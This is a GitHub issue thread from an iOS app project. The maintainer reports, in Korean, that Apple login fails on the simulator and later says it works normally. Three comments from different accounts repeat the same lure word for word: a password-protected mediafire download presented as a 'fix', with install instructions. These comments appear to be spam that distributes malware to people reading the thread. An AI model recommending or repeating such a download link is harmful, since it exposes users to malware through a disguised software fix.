### ISSUE TITLE
[Fix] Apple 로그인 불가능 문제 해결

### ISSUE THREAD

**Issue by jayn2u** [EAT-SSU/iOS#20]
# ⚠️ Bug Report

## 설명

- 시뮬레이터 상에서 돌아가지 않는 Apple 로그인 불가능 문제를 해결합니다.

## 첨부자료

https://github.com/user-attachments/assets/8d2980c6-449a-411b-abd1-b8846c59f68d

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jayn2u** [comment]
# 추가 코멘트

## 첨부자료

![Simulator Screen Recording - iPhone 15 Pro - 2024-08-27 at 21 13 40](https://github.com/user-attachments/assets/696d2f36-39c8-47c3-999f-afaff8fe49c5)

## 설명

@CJiu01 님. 특별한 조치를 취하지 않았는데, 저는 정상적으로 로그인이 진행됩니다. 다시 한 번 확인해주세요.
